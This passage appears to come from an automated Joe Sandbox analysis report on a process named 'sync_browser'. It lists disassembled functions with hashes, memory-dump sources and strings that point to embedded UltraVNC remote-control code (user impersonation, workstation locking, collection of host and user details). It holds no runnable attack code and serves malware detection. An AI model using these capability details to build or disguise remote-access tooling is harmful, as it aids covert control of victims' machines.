                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$Enter
                                                                      • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                      • API String ID: 2978645861-1267036565
                                                                      • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                      • Instruction ID: 368fd7911ed5f3413f59dd642ffef68d789cf76b9c83bf2bcfb553d9453a3adc
                                                                      • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                      • Instruction Fuzzy Hash: C8515561A1C58A95F660BB25A8343FAA391FF85F51FC41033E94EC6298DE3DD405C762
                                                                      Function 00007FF7E5098A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                      • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                      • API String ID: 1264956880-3227535004
                                                                      • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                      • Instruction ID: cde0a119aff02111e618bd49156f6a7c0000289d4a3db8d7d7d3300b8ef9b7ab
                                                                      • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                      • Instruction Fuzzy Hash: 09A10532614A9A8AD750EF1AE454B6AB7A8FBC8F90F415036EE4E83754DF3DD805CB10
                                                                      Function 00007FF7E5077A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                      • API String ID: 171970310-1756215141
                                                                      • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                      • Instruction ID: 9e4a52e97373f608b08790c932a68ef852a09582b9d84ddcc330137be8b1f6c6
                                                                      • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                      • Instruction Fuzzy Hash: BDB18421A0868985E761AB3598203B977A0FB05BB0F804337E67EC39D9DF3CE515C361
                                                                      Function 00007FF7E5077A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                      • API String ID: 171970310-18614430
                                                                      • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                      • Instruction ID: e2b502f9698e367d76532b399076fda02443964d0b20f55e462f27f6bdf5f50d
                                                                      • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                      • Instruction Fuzzy Hash: 99B18421A0868985E761AB35A8203B977A0FB05BB4F804337E67DC39D9DF3CE555C321
                                                                      Function 00007FF7E5077A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                      • API String ID: 171970310-978419383
                                                                      • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                      • Instruction ID: 8bc26181780a19740332c9b6610feb7be0611139676a55bec6e23c209de62a95
                                                                      • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                      • Instruction Fuzzy Hash: 1DB18521A0868A85E761EB3598203B977A0FB04BB0F804337E67EC79D9DF38E515C321
                                                                      Function 00007FF7E5077ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                      • API String ID: 171970310-3227166451
                                                                      • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                      • Instruction ID: c07862cc0c5e61241434e29a6e56362d288a2944172cde9f41bd87d030666f28
                                                                      • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                      • Instruction Fuzzy Hash: DCB18521A0868985E761EB3598203B977A0FB05BB0F804337E67EC79D9DF38E555C321
                                                                      Function 00007FF7E5077B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                      • API String ID: 171970310-733379141
                                                                      • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                      • Instruction ID: 6264ae0142e9abc46da50a26b1c972416681307278d698e8f3492d79331715eb
                                                                      • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                      • Instruction Fuzzy Hash: 2CB18521A0868A85E761EB3598213B977A0FB05BB4F804337E67EC79D9DF38E515C321
                                                                      Function 00007FF7E50779E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                      • API String ID: 171970310-3029765189
                                                                      • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                      • Instruction ID: d6c513aa36563b652ad9c6662c3539ed6e10c77dbf2d37a9b2277c7a84d63854
                                                                      • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                      • Instruction Fuzzy Hash: A5B19721A0868A85E761EB3594203B977A0FB04BB0F804337E67EC79D5DF38E555C321
                                                                      Function 00007FF7E50826B0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 78librarysleeploaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                                      • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                                      • API String ID: 2931780912-670137772
                                                                      • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                      • Instruction ID: bbaf930df641cafa58e8df7c97c0b3ae39cff7ae889df201635ffd18f5b557ce
                                                                      • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                      • Instruction Fuzzy Hash: 12314C25A18A4B81EA21FF26B5747B9A3A1FF44F91FC41433D90E86658EF3CE4058762
                                                                      Function 00007FF7E507D560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                      • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                                      • API String ID: 421869683-3362258117
                                                                      • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                      • Instruction ID: 99871ae38a3768fb056c536664c2d46ff533ad852bf7ac583b3e6e1fbc70c8fe
                                                                      • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                      • Instruction Fuzzy Hash: 9C519532A08B4985E714EF25B8603B9B7A4FB44B90F844236EA9D83A98DF3CE515C751
                                                                      Function 00007FF7E5086930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E5086A39
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E50869F2
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E50869A4
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E508695B
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E5086A0B
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E5086BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                      • API String ID: 181403729-1081969236
                                                                      • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                      • Instruction ID: a453874463346758b0a823c77c203f0a89409f27120919b59cb105a413a578ce
                                                                      • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                      • Instruction Fuzzy Hash: E4613862A185D981F724AB25F4357B9B390EB50B44FC4503BF98ECB695EE3CD109C722
                                                                      Function 00007FF7E5092650 Relevance: 18.4, APIs: 9, Strings: 3, Instructions: 431COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
